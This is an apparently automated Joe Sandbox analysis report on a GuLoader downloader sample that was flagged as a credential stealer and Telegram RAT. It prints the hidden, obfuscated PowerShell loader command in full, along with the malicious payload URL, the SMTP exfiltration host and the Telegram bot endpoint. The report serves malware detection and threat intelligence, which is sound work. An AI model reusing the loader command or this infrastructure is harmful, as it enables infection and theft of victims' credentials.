Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LE2dyDn347.exe

Overview

General Information

Sample name:LE2dyDn347.exe
renamed because original name is a hash value
Original sample name:b7219044f45a1b030f5b784d35a92f1ee2d2343059fd7467115a5456fb2e5cba.exe
Analysis ID:1631843
MD5:b3688b35ceac51a6461e8c270b959c91
SHA1:dac88f1b96c5090b828dc639130fade6315306cf
SHA256:b7219044f45a1b030f5b784d35a92f1ee2d2343059fd7467115a5456fb2e5cba
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Early bird code injection technique detected
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Telegram RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • LE2dyDn347.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\LE2dyDn347.exe" MD5: B3688B35CEAC51A6461E8C270B959C91)
    • powershell.exe (PID: 7544 cmdline: powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1080 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000001.00000002.1777193585.000000000A510000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: msiexec.exe PID: 1080JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: msiexec.exe PID: 1080JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)", CommandLine: powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LE2dyDn347.exe", ParentImage: C:\Users\user\Desktop\LE2dyDn347.exe, ParentProcessId: 7520, ParentProcessName: LE2dyDn347.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)", ProcessId: 7544, ProcessName: powershell.exe
            Sigma detected: Msiexec Initiated Connection
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.93.120.241, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1080, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49719
            Sigma detected: Suspicious Outbound SMTP Connections
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.153.221.224, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1080, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49722
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)", CommandLine: powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LE2dyDn347.exe", ParentImage: C:\Users\user\Desktop\LE2dyDn347.exe, ParentProcessId: 7520, ParentProcessName: LE2dyDn347.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)", ProcessId: 7544, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:34:07.958232+010028032742Potentially Bad Traffic192.168.2.449720193.122.130.080TCP
            2025-03-07T16:34:15.808474+010028032742Potentially Bad Traffic192.168.2.449720193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:34:05.986843+010028032702Potentially Bad Traffic192.168.2.449719172.93.120.24180TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: LE2dyDn347.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: LE2dyDn347.exeVirustotal: Detection: 59%Perma Link
            Source: LE2dyDn347.exeReversingLabs: Detection: 44%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: LE2dyDn347.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49721 version: TLS 1.0
            Source: LE2dyDn347.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000001.00000002.1775288111.0000000008262000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ?\C:\Windows\System.Core.pdb source: powershell.exe, 00000001.00000002.1775288111.0000000008262000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdbmo source: powershell.exe, 00000001.00000002.1775288111.00000000081E3000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_004065FD FindFirstFileA,FindClose,0_2_004065FD
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_00405A2C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A2C
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 00135782h9_2_00135358
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 001351B9h9_2_00134F08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 00135782h9_2_001356AF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25391935h9_2_253915F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539C7D8h9_2_2539C530
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539EBD0h9_2_2539E928
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25390FF1h9_2_25390D48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25391449h9_2_253911A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539CC30h9_2_2539C988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539F028h9_2_2539ED80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539D088h9_2_2539CDE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539F480h9_2_2539F1D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539BAD0h9_2_2539B828
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539DEC8h9_2_2539DC20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539E320h9_2_2539E078
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25393EF8h9_2_25393C50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253902E9h9_2_25390040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25394350h9_2_253940A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25390741h9_2_25390498
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539BF28h9_2_2539BC80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25390B99h9_2_253908F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539C380h9_2_2539C0D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539E778h9_2_2539E4D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539ADC8h9_2_2539AB20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539B220h9_2_2539AF78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253931F0h9_2_25392F48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25393648h9_2_253933A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25393AA0h9_2_253937F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539B678h9_2_2539B3D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539D4E0h9_2_2539D238
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539F8D8h9_2_2539F630
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539A0C0h9_2_25399E18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539A518h9_2_2539A270
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539D93Ah9_2_2539D690
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539FD30h9_2_2539FA88
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25392D98h9_2_25392AF0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2539A970h9_2_2539A6C8
            Source: global trafficTCP traffic: 192.168.2.4:49722 -> 185.153.221.224:587
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49719 -> 172.93.120.241:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49720 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.4:49722 -> 185.153.221.224:587
            Source: global trafficHTTP traffic detected: GET /esto.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: tylom.za.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49721 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /esto.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: tylom.za.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: tylom.za.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: mail.vernazzasuites.com
            Source: msiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: msiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
            Source: msiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2501273805.0000000023193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000009.00000002.2501273805.0000000023121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: msiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
            Source: msiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
            Source: powershell.exe, 00000001.00000002.1775288111.00000000081E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: powershell.exe, 00000001.00000002.1770754226.0000000007010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: msiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.vernazzasuites.com
            Source: msiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.vernazzasuites.comd
            Source: LE2dyDn347.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: LE2dyDn347.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.1768696741.0000000005829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1765991197.0000000002A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: msiexec.exe, 00000009.00000002.2501273805.00000000231BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: msiexec.exe, 00000009.00000002.2501273805.00000000231BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
            Source: powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.1766504188.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2501273805.0000000023121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: msiexec.exe, 00000009.00000002.2489892391.00000000078BC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2500659176.0000000022850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tylom.za.com/esto.bin
            Source: msiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vernazzasuites.com
            Source: msiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vernazzasuites.comd
            Source: powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1765991197.0000000002A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.1766504188.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: msiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: powershell.exe, 00000001.00000002.1768696741.0000000005829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.1768696741.0000000005829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.1768696741.0000000005829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1765991197.0000000002A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1765991197.0000000002A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.S
            Source: powershell.exe, 00000001.00000002.1765991197.0000000002A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.SmbShare.cdxml=39327
            Source: powershell.exe, 00000001.00000002.1768696741.0000000005829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
            Source: msiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_004054EC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054EC
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_004033B5 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B5
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile created: C:\Windows\resources\0809\DunkadooJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile created: C:\Windows\resources\0809\Dunkadoo\TorydomJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072DC15E1_2_072DC15E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0013C1689_2_0013C168
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0013CA589_2_0013CA58
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00134F089_2_00134F08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0013B9D89_2_0013B9D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0013B9E09_2_0013B9E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00132DD19_2_00132DD1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00137E599_2_00137E59
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00137E689_2_00137E68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00134EFB9_2_00134EFB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253945009_2_25394500
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253915F89_2_253915F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25391C589_2_25391C58
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25390D3A9_2_25390D3A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539C5309_2_2539C530
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539E9289_2_2539E928
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539C5209_2_2539C520
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539E9229_2_2539E922
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539C97A9_2_2539C97A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539ED709_2_2539ED70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_25390D489_2_25390D48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253911A09_2_253911A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253911999_2_25391199
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539C9889_2_2539C988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539ED809_2_2539ED80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_253915EA9_2_253915EA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539CDE09_2_2539CDE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539F1D89_2_2539F1D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539CDD09_2_2539CDD0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539F1C89_2_2539F1C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539B8289_2_2539B828
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2539DC209_2_2539DC20
